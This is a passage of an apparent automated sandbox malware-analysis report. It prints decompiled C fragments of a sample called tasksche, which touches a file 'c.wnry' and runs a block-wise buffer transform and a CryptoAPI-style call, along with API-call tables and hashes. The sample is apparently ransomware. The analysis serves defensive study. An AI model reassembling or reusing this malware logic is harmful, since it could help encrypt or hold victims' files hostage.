			 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
			 *(_t194 + 0x10) = _t131 - _t163;
			_t133 =  *((intOrPtr*)(_t198 + 0x38));
			if(_t133 != 0) {
				_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
				 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
				_t201 = _t201 + 0xc;
				 *((intOrPtr*)(_t194 + 0x30)) = _t135;
			}
			if(_t163 != 0) {
				memcpy(_v12, _a4, _t163);
				_v12 = _v12 + _t163;
				_a4 = _a4 + _t163;
			}
		}
		 *(_t194 + 0xc) = _v12;
		 *((intOrPtr*)(_t198 + 0x30)) = _a4;
		return _a8;
	} else {
		_t170 =  *(_t197 + 0x3cc);
		if(_t121 % _t170 != 0) {
			goto L15;
		} else {
			if(_a16 != 1) {
				_t195 = _a4;
				_t139 = _a12;
				_a16 = 0;
				_t164 = _a8;
				if(_a16 != 2) {
					_t140 = _t139 / _t170;
					if(_t140 > 0) {
						do {
							E00403797(_t197, _t195, _t164);
							_t172 =  *(_t197 + 0x3cc);
							_t195 = _t195 + _t172;
							_t143 = _a12 / _t172;
							_t164 = _t164 + _t172;
							_a16 = _a16 + 1;
						} while (_a16 < _t143);
						return _t143;
					}
				} else {
					_t140 = _t139 / _t170;
					if(_t140 > 0) {
						do {
							E0040350F(_t197, _t197 + 0x3f0, _t164);
							E00403A28(_t197, _t164, _t195);
							memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
							_t175 =  *(_t197 + 0x3cc);
							_t201 = _t201 + 0xc;
							_t150 = _a12 / _t175;
							_t195 = _t195 + _t175;
							_t164 = _t164 + _t175;
							_a16 = _a16 + 1;
						} while (_a16 < _t150);
						return _t150;
					}
				}
			} else {
				_t196 = _a4;
				_t140 = _a12 / _t170;
				_a16 = 0;
				_t165 = _a8;
				if(_t140 > 0) {
					do {
						E00403797(_t197, _t196, _t165);
						E00403A28(_t197, _t165, _t197 + 0x3f0);
						memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
						_t178 =  *(_t197 + 0x3cc);
						_t201 = _t201 + 0xc;
						_t140 = _a12 / _t178;
						_t196 = _t196 + _t178;
						_t165 = _t165 + _t178;
						_a16 = _a16 + 1;
					} while (_a16 < _t140);
				}
			}
			return _t140;
		}
	}
}
                                                                                                                                                0x00403c02
                                                                                                                                                0x00403c02
                                                                                                                                                0x00403c06
                                                                                                                                                0x00403c0e
                                                                                                                                                0x00403c0e
                                                                                                                                                0x00403c12
                                                                                                                                                0x00403c17
                                                                                                                                                0x00403c1a
                                                                                                                                                0x00403c1f
                                                                                                                                                0x00403c26
                                                                                                                                                0x00403c28
                                                                                                                                                0x00403c2b
                                                                                                                                                0x00403c2e
                                                                                                                                                0x00403c2e
                                                                                                                                                0x00403c33
                                                                                                                                                0x00403c3c
                                                                                                                                                0x00403c41
                                                                                                                                                0x00403c44
                                                                                                                                                0x00403c47
                                                                                                                                                0x00403c47
                                                                                                                                                0x00403c4a
                                                                                                                                                0x00403c50
                                                                                                                                                0x00403c52
                                                                                                                                                0x00403c58
                                                                                                                                                0x00403c5b
                                                                                                                                                0x00403c5d
                                                                                                                                                0x00403c5d
                                                                                                                                                0x00403c63
                                                                                                                                                0x00403c63
                                                                                                                                                0x00403c66
                                                                                                                                                0x00403c6a
                                                                                                                                                0x00403c6c
                                                                                                                                                0x00403c6c
                                                                                                                                                0x00403c70
                                                                                                                                                0x00403c78
                                                                                                                                                0x00403c78
                                                                                                                                                0x00403c7c
                                                                                                                                                0x00403c81
                                                                                                                                                0x00403c84
                                                                                                                                                0x00403c89
                                                                                                                                                0x00403c90
                                                                                                                                                0x00403c92
                                                                                                                                                0x00403c95
                                                                                                                                                0x00403c98
                                                                                                                                                0x00403c98
                                                                                                                                                0x00403c9d
                                                                                                                                                0x00403ca6
                                                                                                                                                0x00403cab
                                                                                                                                                0x00403cb1
                                                                                                                                                0x00403cb1
                                                                                                                                                0x00403c9d
                                                                                                                                                0x00403cb7
                                                                                                                                                0x00403cbd
                                                                                                                                                0x00403cc7
                                                                                                                                                0x00403ab0
                                                                                                                                                0x00403ab0
                                                                                                                                                0x00403abc
                                                                                                                                                0x00000000
                                                                                                                                                0x00403ac2
                                                                                                                                                0x00403ac6
                                                                                                                                                0x00403b2c
                                                                                                                                                0x00403b2f
                                                                                                                                                0x00403b32
                                                                                                                                                0x00403b35
                                                                                                                                                0x00403b38
                                                                                                                                                0x00403b8d
                                                                                                                                                0x00403b91
                                                                                                                                                0x00403b93
                                                                                                                                                0x00403b97
                                                                                                                                                0x00403b9c
                                                                                                                                                0x00403ba7
                                                                                                                                                0x00403ba9
                                                                                                                                                0x00403bab
                                                                                                                                                0x00403bad
                                                                                                                                                0x00403bb0
                                                                                                                                                0x00000000
                                                                                                                                                0x00403b93
                                                                                                                                                0x00403b3a
                                                                                                                                                0x00403b3c
                                                                                                                                                0x00403b40
                                                                                                                                                0x00403b42
                                                                                                                                                0x00403b4c
                                                                                                                                                0x00403b55
                                                                                                                                                0x00403b68
                                                                                                                                                0x00403b6d
                                                                                                                                                0x00403b78
                                                                                                                                                0x00403b7b
                                                                                                                                                0x00403b7d
                                                                                                                                                0x00403b7f
                                                                                                                                                0x00403b81
                                                                                                                                                0x00403b84
                                                                                                                                                0x00000000
                                                                                                                                                0x00403b42
                                                                                                                                                0x00403b40
                                                                                                                                                0x00403ac8
                                                                                                                                                0x00403acb
                                                                                                                                                0x00403ace
                                                                                                                                                0x00403ad0
                                                                                                                                                0x00403ad3
                                                                                                                                                0x00403ad8
                                                                                                                                                0x00403ada
                                                                                                                                                0x00403ade
                                                                                                                                                0x00403aed
                                                                                                                                                0x00403b00
                                                                                                                                                0x00403b05
                                                                                                                                                0x00403b10
                                                                                                                                                0x00403b13
                                                                                                                                                0x00403b15
                                                                                                                                                0x00403b17
                                                                                                                                                0x00403b19
                                                                                                                                                0x00403b1c
                                                                                                                                                0x00403ada
                                                                                                                                                0x00403ad8
                                                                                                                                                0x00403b25
                                                                                                                                                0x00403b25
                                                                                                                                                0x00403abc

APIs
• ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
• _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
• memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
• ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
• _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: ??0exception@@ExceptionThrowmemcpy
• String ID:
• API String ID: 2382887404-0
• Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
• Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
• Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
• Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
Uniqueness

Uniqueness Score: -1.00%

APIs
• fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
• fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
• fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
• fclose.MSVCRT(00000000), ref: 00401058
Strings
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: fclosefopenfreadfwrite
• String ID: c.wnry
• API String ID: 4000964834-3240288721
• Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
• Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
• Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
• Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 24%
E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
    struct _OVERLAPPED* _v8;
    char _v20;
    long _v32;
    struct _OVERLAPPED* _v36;
    long _v40;
    signed int _v44;
    void* _t18;
    void* _t28;
    long _t34;
    intOrPtr _t38;

    _push(0xffffffff);
    _push(0x4081f0);
    _push(0x4076f4);
    _push( *[fs:0x0]);
     *[fs:0x0] = _t38;
    _v44 = _v44 | 0xffffffff;
    _v32 = 0;
    _v36 = 0;
    _v8 = 0;
    _t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                				_v44 = _t18;
                                                                                                                                                				if(_t18 != 0xffffffff) {
                                                                                                                                                					_t34 = GetFileSize(_t18, 0);
                                                                                                                                                					_v40 = _t34;
                                                                                                                                                					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
                                                                                                                                                						_t28 = GlobalAlloc(0, _t34);
                                                                                                                                                						_v36 = _t28;
                                                                                                                                                						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
                                                                                                                                                							_push(_a8);
                                                                                                                                                							_push(0);
                                                                                                                                                							_push(0);
                                                                                                                                                							_push(_v32);
                                                                                                                                                							_push(_t28);
                                                                                                                                                							_push(_a4);
                                                                                                                                                							if( *0x40f898() != 0) {
                                                                                                                                                								_push(1);
                                                                                                                                                								_pop(0);
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push( &_v20);
                                                                                                                                                				L004076FA();
                                                                                                                                                				 *[fs:0x0] = _v20;
                                                                                                                                                				return 0;
                                                                                                                                                			}
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
• GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
• ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
• _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: File$AllocCreateGlobalReadSize_local_unwind2
• String ID:
• API String ID: 2811923685-0
• Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
• Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
• Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
• Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 97%
E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
	char _v5;
	char _v6;
	long _t30;
	char _t32;
	long _t34;
	void* _t46;
	intOrPtr* _t49;
	long _t50;

	_t30 = _a12;
	if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
		_t49 = _a16;
		_t46 = 0;
		_v6 = 0;
		 *_t49 = 0;
		_v5 = 0;
		if(_t30 == 1) {
			_t46 = _a4;
			_v5 = 0;
			L11:
			_t30 = SetFilePointer(_t46, 0, 0, 1);
			_v6 = _t30 != 0xffffffff;
			L12:
			_push(0x20);
			L00407700();
			_t50 = _t30;
			if(_a12 == 1 || _a12 == 2) {
				 *_t50 = 1;
				 *((char*)(_t50 + 0x10)) = _v5;
				_t32 = _v6;
				 *((char*)(_t50 + 1)) = _t32;
				 *(_t50 + 4) = _t46;
				 *((char*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = 0;
				if(_t32 != 0) {
					 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
				}
			} else {
				 *_t50 = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = _a4;
				 *((char*)(_t50 + 1)) = 1;
				 *((char*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x18)) = _a8;
				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = 0;
			}
			 *_a16 = 0;
			_t34 = _t50;
			goto L18;
		}
		if(_t30 != 2) {
			goto L12;
		}
		_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
		if(_t46 != 0xffffffff) {
			_v5 = 1;
			goto L11;
		}
		 *_t49 = 0x200;
		goto L8;
	} else {
		 *_a16 = 0x10000;
		L8:
		_t34 = 0;
		L18:
		return _t34;
	}
}
                                                                                                                                                0x00405c5b
                                                                                                                                                0x00405c5e
                                                                                                                                                0x00405c61
                                                                                                                                                0x00405c64
                                                                                                                                                0x00405c64
                                                                                                                                                0x00405c96
                                                                                                                                                0x00405c98
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c98
                                                                                                                                                0x00405be9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c04
                                                                                                                                                0x00405c09
                                                                                                                                                0x00405c20
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c20
                                                                                                                                                0x00405c0b
                                                                                                                                                0x00000000
                                                                                                                                                0x00405bc7
                                                                                                                                                0x00405bca
                                                                                                                                                0x00405c11
                                                                                                                                                0x00405c11
                                                                                                                                                0x00405c9a
                                                                                                                                                0x00405c9e
                                                                                                                                                0x00405c9e

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
• ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: File$Pointer$??2@Create
• String ID:
• API String ID: 1331958074-0
• Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
• Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
• Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
• Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
E00402924(intOrPtr* _a4, char _a8) {
	intOrPtr _v8;
	intOrPtr* _t26;
	intOrPtr* _t28;
	void* _t29;
	intOrPtr _t30;
	void* _t32;
	signed int _t33;
	signed int _t37;
	signed short* _t41;
	intOrPtr _t44;
	intOrPtr _t49;
	intOrPtr* _t55;
	intOrPtr _t58;
	void* _t59;

	_t26 = _a4;
	_t44 =  *((intOrPtr*)(_t26 + 4));
	_t28 =  *_t26 + 0x78;
	_v8 = _t44;
	if( *((intOrPtr*)(_t28 + 4)) == 0) {
		L11:
		SetLastError(0x7f);
		_t29 = 0;
	} else {
		_t58 =  *_t28;
		_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
		_t59 = _t58 + _t44;
		if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
			goto L11;
		} else {
			_t8 =  &_a8; // 0x402150
			if( *_t8 >> 0x10 != 0) {
				_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
				_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
				_a4 = 0;
				if(_t30 <= 0) {
					goto L11;
				} else {
					while(1) {
						_t32 =  *_t55 + _t44;
						_t15 =  &_a8; // 0x402150
						__imp___stricmp( *_t15, _t32);
						if(_t32 == 0) {
							break;
						}
						_a4 = _a4 + 1;
						_t55 = _t55 + 4;
						_t41 =  &(_t41[1]);
						if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
							_t44 = _v8;
							continue;
						} else {
							goto L11;
						}
						goto L12;
					}
					_t33 =  *_t41 & 0x0000ffff;
					_t44 = _v8;
					goto L14;
				}
			} else {
				_t9 =  &_a8; // 0x402150
				_t37 =  *_t9 & 0x0000ffff;
				_t49 =  *((intOrPtr*)(_t59 + 0x10));
				if(_t37 < _t49) {
					goto L11;
				} else {
					_t33 = _t37 - _t49;
					L14:
					if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
						goto L11;
					} else {
						_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
					}
				}
			}
		}
	}
	L12:
	return _t29;
}

                                                                                                                                                0x004029c8
                                                                                                                                                0x004029c8
                                                                                                                                                0x004029bd
                                                                                                                                                0x00402965
                                                                                                                                                0x0040295a
                                                                                                                                                0x0040294a
                                                                                                                                                0x004029af
                                                                                                                                                0x004029b3

                                                                                                                                                APIs
                                                                                                                                                • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast_stricmp
                                                                                                                                                • String ID: P!@
                                                                                                                                                • API String ID: 1278613211-1774101457
                                                                                                                                                • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                                                                                • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                                                                                                                                                • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                                                                                • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00401DFE(void* __eax) {
                                                                                                                                                				int _t21;
                                                                                                                                                				signed int _t27;
                                                                                                                                                				signed int _t29;
                                                                                                                                                				void* _t34;
                                                                                                                                                				void* _t36;
                                                                                                                                                				void* _t38;
                                                                                                                                                				void* _t40;
                                                                                                                                                				void* _t41;
                                                                                                                                                				void* _t43;
                                                                                                                                                
                                                                                                                                                				_t36 = __eax;
                                                                                                                                                				_t41 = _t40 + 0xc;
                                                                                                                                                				if(__eax != 0) {
                                                                                                                                                					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
                                                                                                                                                					_t29 = 0x4a;
                                                                                                                                                					memset(_t38 - 0x128, 0, _t29 << 2);
                                                                                                                                                					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
                                                                                                                                                					_t27 =  *(_t38 - 0x12c);
                                                                                                                                                					_t43 = _t41 + 0x18;
                                                                                                                                                					_t34 = 0;
                                                                                                                                                					if(_t27 > 0) {
                                                                                                                                                						do {
                                                                                                                                                							E004075C4(_t36, _t34, _t38 - 0x12c);
                                                                                                                                                							_t21 = strcmp(_t38 - 0x128, "c.wnry");
                                                                                                                                                							_t43 = _t43 + 0x14;
                                                                                                                                                							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
                                                                                                                                                								E0040763D(_t36, _t34, _t38 - 0x128);
                                                                                                                                                								_t43 = _t43 + 0xc;
                                                                                                                                                							}
                                                                                                                                                							_t34 = _t34 + 1;
                                                                                                                                                						} while (_t34 < _t27);
                                                                                                                                                					}
                                                                                                                                                					E00407656(_t36);
                                                                                                                                                					_push(1);
                                                                                                                                                					_pop(0);
                                                                                                                                                				} else {
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                			}

                                                                                                                                                 Instruction addresses (one per decompiled line, in order): 0x00401dfe, 0x00401e00, 0x00401e05, 0x00401e0e, 0x00401e1a, 0x00401e21, 0x00401e2d, 0x00401e32, 0x00401e38, 0x00401e3b, 0x00401e3f, 0x00401e41, 0x00401e4a, 0x00401e5b, 0x00401e60, 0x00401e65, 0x00401e82, 0x00401e87, 0x00401e87, 0x00401e8a, 0x00401e8b, 0x00401e41, 0x00401e90, 0x00401e96, 0x00401e98, 0x00401e07, 0x00401e07, 0x00401e9d

                                                                                                                                                APIs
                                                                                                                                                • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFilestrcmp
                                                                                                                                                • String ID: c.wnry
                                                                                                                                                • API String ID: 3324900478-3240288721
                                                                                                                                                • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                                                                                • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                                                                                                                                                • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                                                                                • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E00405C9F(signed int __eax, intOrPtr _a4) {
                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                
                                                                                                                                                				_t9 = _a4;
                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                					if( *((char*)(_t9 + 0x10)) != 0) {
                                                                                                                                                						CloseHandle( *(_t9 + 4));
                                                                                                                                                					}
                                                                                                                                                					_push(_t9);
                                                                                                                                                					L004076E8();
                                                                                                                                                					return 0;
                                                                                                                                                				} else {
                                                                                                                                                					return __eax | 0xffffffff;
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                 Instruction addresses (one per decompiled line, in order): 0x00405ca0, 0x00405ca6, 0x00405cb1, 0x00405cb6, 0x00405cb6, 0x00405cbc, 0x00405cbd, 0x00405cc6, 0x00405ca8, 0x00405cac, 0x00405cac

                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@CloseHandle
                                                                                                                                                • String ID: $l@
                                                                                                                                                • API String ID: 3816424416-2140230165
                                                                                                                                                • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                                                                                • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                                                                                                                                                • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                                                                                • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 25%
			/* Decompiled by the Joe Sandbox IDA plugin; the decompiler's variable names are kept.
			   Argument roles, inferred from how they are used: _a4 = data buffer that is
			   transformed in place, _a8 = its length (passed by address, so the callee can
			   update it), _a12 = caller's output buffer, _a16 = receives the output length. */
			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;                        /* object pointer: handle at +8, lock at +0x10 */
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					return 0;                        /* no handle yet: fail without taking the lock */
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);          /* ref 004019F2 */
				/* Indirect call through the function pointer stored at 0x40f8a4; the decompiler
				   did not resolve the target. The argument shape (handle, 0, 1, 0, buffer, &length)
				   is that of a CryptoAPI-style in-place transform; that is an inference from the
				   call site, not something the report states. */
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				if(_t13 != 0) {
